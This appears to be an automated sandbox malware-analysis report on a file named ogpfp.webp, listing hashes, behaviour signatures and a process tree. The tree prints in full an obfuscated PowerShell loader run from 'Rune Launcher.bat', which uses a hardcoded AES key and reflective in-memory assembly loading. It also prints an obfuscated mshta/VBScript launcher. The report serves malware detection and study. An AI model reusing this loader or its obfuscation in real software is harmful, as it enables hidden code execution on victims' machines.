Analysis
-
max time kernel
149s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
-
submitted
11/11/2023, 19:54
General
-
Target
ogpfp.webp
-
Size
2KB
-
MD5
34c23c33643b37d0a38e636dfdaa7998
-
SHA1
3468bd3d1ba7605ab2f92c942a64bcd4b361075f
-
SHA256
525e633900e52ac6f6e58f1e2ddb8585fda73a62babe82d181dc28abceec5aa8
-
SHA512
5339ea5fe97089dcb3577ac632ce14e2cc5f6bbf67bb8ff19e1d5037ae987d1cb11c3d0dc8b7914b012fc418e7f5d16575df7ff312af98c7c0365c8f2d742356
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 45 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 48 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{167f0e24-1906-4b45-94f1-eb4fd4b28d6a}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ogpfp.webp1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\ogpfp.webp2⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffde2fe46f8,0x7ffde2fe4708,0x7ffde2fe47183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3544 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1988 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3584 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,234447245237295443,11480564868777837708,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3136 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffde3129758,0x7ffde3129768,0x7ffde31297781⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:21⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=3032 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=3040 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --mojo-platform-channel-handle=4648 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3964 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4928 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3528 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4932 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:81⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Rune\Rune Launcher.bat" "1⤵
-
C:\Users\Admin\Downloads\Rune\Rune Launcher.bat.exe"Rune Launcher.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function SHGwC($UTBCI){ $fmqbG=[System.Security.Cryptography.Aes]::Create(); $fmqbG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $fmqbG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $fmqbG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdXtlctSlAP8m6SKCcO2vkUdPZ3Es/58jfEWNOVlhFQ='); $fmqbG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/iWwpOMjdiY7RIMNInl/fA=='); $HomqC=$fmqbG.CreateDecryptor(); $return_var=$HomqC.TransformFinalBlock($UTBCI, 0, $UTBCI.Length); $HomqC.Dispose(); $fmqbG.Dispose(); $return_var;}function deYtL($UTBCI){ $znuQU=New-Object System.IO.MemoryStream(,$UTBCI); $MFuZx=New-Object System.IO.MemoryStream; $mbhrH=New-Object System.IO.Compression.GZipStream($znuQU, [IO.Compression.CompressionMode]::Decompress); $mbhrH.CopyTo($MFuZx); $mbhrH.Dispose(); $znuQU.Dispose(); $MFuZx.Dispose(); $MFuZx.ToArray();}function IPTXo($UTBCI,$xCkWf){ $UZztt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UTBCI); $nwjQd=$UZztt.EntryPoint; $nwjQd.Invoke($null, $xCkWf);}$gjCip=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Rune\Rune Launcher.bat').Split([Environment]::NewLine);foreach ($iuYEU in $gjCip) { if ($iuYEU.StartsWith('SEROXEN')) { $LOAzE=$iuYEU.Substring(7); break; }}$ceDNZ=[string[]]$LOAzE.Split('\');$SeRqZ=deYtL (SHGwC ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ceDNZ[0])));$KRkmN=deYtL (SHGwC ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ceDNZ[1])));IPTXo $KRkmN (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));IPTXo $SeRqZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{e6aa73e6-6a06-4bf3-a195-f4977b5c7b1f}3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\Downloads\Rune\Rune Launcher.bat.exe"C:\Users\Admin\Downloads\Rune\Rune Launcher.bat.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2752 --field-trial-handle=1924,i,6038641820934767461,14416307313191331222,131072 /prefetch:21⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ivkHnyDhFxrjOkRYhXDt4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e2e294655c07fde908f567adac7d7db8
SHA15bdadbfcd89391b32331458e4f177ef68ea91ca0
SHA256c9574e0da2d34dfa91b1eb36dd797e42ed5ce1c24277b05fab7f14874adafa3a
SHA51248977425c41ff066fcbf4130e4c2fc0947468da287c47eb1709f58d3ddfcb04e81c12732f032ad83f2db3d4a5e15bde14c5615a9ebd72b5a7d4ddc45328aec90
-
Filesize
371B
MD5592b1486352dacd70a4accbff4102f9b
SHA18aff1913e4db1f51909ba59fcca9a603ff0fceb2
SHA2563efb44208e448d03065ea3ab32c402db55d0c4bbaccdaf3f3426446e4c55470f
SHA5127e6ad2dcb22e269feafe5dfe01526d9770d876cb4c39ccb5da2c44110dfeb21d7ee8e028c117fd6677b598c6a99027d68a66e25cb04774e3d1dbf4137a198d85
-
Filesize
152B
MD50629525c94f6548880f5f3a67846755e
SHA140ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa
-
Filesize
96B
MD57c60ff87d43a44e52af3155d65d7a6ec
SHA1927690eba9e461e0d4190e6aa92afcd9244b3fb2
SHA256ff517998fd33928c7bc49eaf62188096cdc50dec9cc31d1bbfaab794f12cbeae
SHA512cd63198d1f46bec23642a73b9a0b5a1d1cbe0656524028a30bebebe2d1f3ec993a99114c6435a58d8c7a0c1b323fffad1c9574051d03539081f0c6d2a24f53fa
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
1KB
MD51c2f134ed04048ace685ccdfb9e319d6
SHA1022bee68a05f6039d5828127387b74232c5cc6ef
SHA2561638bdfcb961bfec7a5b77d48d7b75c6c139d725a601a4c64ad92acfa750bda5
SHA5129b8c631759ebebbe2a94a6e851b9441f7e855cec60e8b2aae7233b09b94e7c1b2aeef0cb8159cacf21a8841514ce9258223267013ef2d927c172568c41ecae70
-
Filesize
5KB
MD561792edf7522a4609db1af729ec7435e
SHA11c438d9606f2fbf306bad4fdf1c7373a6ea5f6e6
SHA256f82cabfbb11615256bab9bab4f164d7a797320093caa8eb4cdd9c22206349fb2
SHA51224e00a52854880ba773ccef5b91c0d16522b81eefc6815c2be3ec2d2af6113d19fe447f714e574562d4d4b17997c457a7a8a80d30316549d39af7d9a6a7cec94
-
Filesize
6KB
MD5446b36c90e98124d06c5ec0d33a75aa7
SHA1ff3922bc2b4041a961c1f2e49d11bc639fe65d04
SHA256ac00e43b473becb45f7239cf8122cb0e2f704ef5312db4b6df65480a108a9777
SHA512f381eb7e22570630b5a686fbe4c47a5f613a5622be5c912263a48a3c07e80b8bdcba84f687151e78feb208a8704b92b4eaddbdefe49ff8112e9a7cb2a257de98
-
Filesize
5KB
MD5535ed7dc2d6b641879b2de0e1719397e
SHA105fd26ccaa58ac3e2640c432a63993895011b1a8
SHA2564c71c3b4a2283f0cf93afcf48730a2a23273f0fdb87b244e1986b62c71443764
SHA512902ac655b20797acdfd4942628cd3a597b994b38041e9cff25ef1e54f128addc5c122f31337df28491dff58eb8ba65367d228b4c1b17a466ce7b88da50ea0446
-
Filesize
6KB
MD5580c2e78a62ed0e05447ce73e04d934e
SHA17eb170a00d6de583a9804a4d2f523040d9d99df9
SHA25670d57463f54b9efbe6e97cd200b87641e4b6203f38140b9dcf797b5d13b5dfc7
SHA512f6a46f7b9dff89b00721ead1e205188450a42a13a223e1f2bb8bc0131f57ff26e51f406ce6dd9f959e117df82e2f885d3079281ec8ab3d7b71a4e975bce5abef
-
Filesize
24KB
MD5fd20981c7184673929dfcab50885629b
SHA114c2437aad662b119689008273844bac535f946c
SHA25628b7a1e7b492fff3e5268a6cd480721f211ceb6f2f999f3698b3b8cbd304bb22
SHA512b99520bbca4d2b39f8bedb59944ad97714a3c9b8a87393719f1cbc40ed63c5834979f49346d31072c4d354c612ab4db9bf7f16e7c15d6802c9ea507d8c46af75
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD5d2c4cf1688989452c17a43e2d0420183
SHA16ec5feea357818db4787bb68de1027f075105767
SHA2560a82ad8ffb9a30edb243d4ffd80deb7e80820f335aac5ab29a0ea428637210c1
SHA512410992cfaecc719bb7b04f6b3c265bc21acf779f3bb94f6f593f53945d5f912a4dbc4a2162bbef031e9f412c1b72b7cce87f2bbad160b07aae0c87a3458b0691
-
Filesize
12KB
MD59726f4f978ee19771378927a2558d9ac
SHA10cfb5888aeb1f69f8705bbd199e5fafac284862c
SHA256a0d27f9cd48956762770bc72e54fb1349cb6fc9488535def328d5d3a4a4837f1
SHA5125623d4abd3e43bdd26ad532550d11daacea4995519a50e0fd03c0d4266ea3c6a2656998f8bbfb80b3a5df94eff06b8197ba990c18c6e2149ea245bcfd4e5021e
-
Filesize
10KB
MD575bea0fad3b4aa8f604f9cbf02357aa9
SHA1c6f4673d42013ad947802638bf607299c0deebdf
SHA2560227a212ccfbda077d8f1d16c6be67cf314d95459561395c11e6016f4e3ce4f6
SHA51221a552b5981a098352724713caad9bfcca8180532caec3375fb751a1832fcd06d7a04e616cd06dd4bdf7f2743af904566e211b92357f43d41fbb7dc61c20d029
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
8.1MB
MD594ba66645ff3125cf0348bbe11cb220b
SHA1ec2d65f3e7924dc6c86a240c348741bd874c0e83
